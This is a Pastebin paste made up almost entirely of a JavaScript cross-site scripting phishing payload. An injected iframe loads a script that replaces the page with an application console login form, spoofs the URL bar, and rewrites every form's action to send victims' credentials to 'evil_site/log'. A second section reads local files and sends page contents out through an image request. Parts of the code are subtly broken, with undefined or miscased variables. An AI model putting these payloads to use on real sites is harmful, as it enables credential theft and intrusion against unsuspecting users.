Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @Abdelmoughite Eljoaydi
- /**
- <iframe src="http://evil_site/phishing.js"></iframe>
- *This payload injects an iframe tag that will load the script located at "/phishing.js”.
- *Let’s take a look at what phishing.js could contain:
- */
- // Function to override the HTML content.
- function override(url) {
- var xhr_req = new XMLHttpRequest();
- xhr_req.open('GET', url, false);
- xhr_req.onreadystatechange = function () {
- if (xhr_req.readyState == 4 && xhr_req.responseText != "") {
- document.innerHTML = xhr_req.responseText;
- }
- }
- xhr_req.send(null);
- }
- //Call override(url) function to override the current page with the content of "LoginForm.jsp".
- override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks.
- //Spoofing current URI (URL bar will look like /console/login/LoginForm.jsp).
- var stateObj = { log: "login" };
- history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp");
- //Hooking forms and submit victim credentials to "http://evil_site/log".
- var forms = document.getElementsByTagName("form");
- for (index = 0; index < forms.length; index++) {
- void(forms[index].action = "http://evil_site/log");
- }
- ==============================================================================================================================
- //Reading local files. (works only on Firefox)
- function _LFileAccess(_method,action,argv){
- req.open(_method,action,false);
- if(_method=="POST")
- req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- req.send(argv);
- return req.responseText;
- }
- var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null);
- dump(local_file);
- //Screen-capture of the current page state.
- XMlHttpReq.open("GET","example.com",false);
- function getURL(s) {
- var image = new Image();
- image.style.width = 0;
- image.style.height = 0;
- image.src = s;
- }
- getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement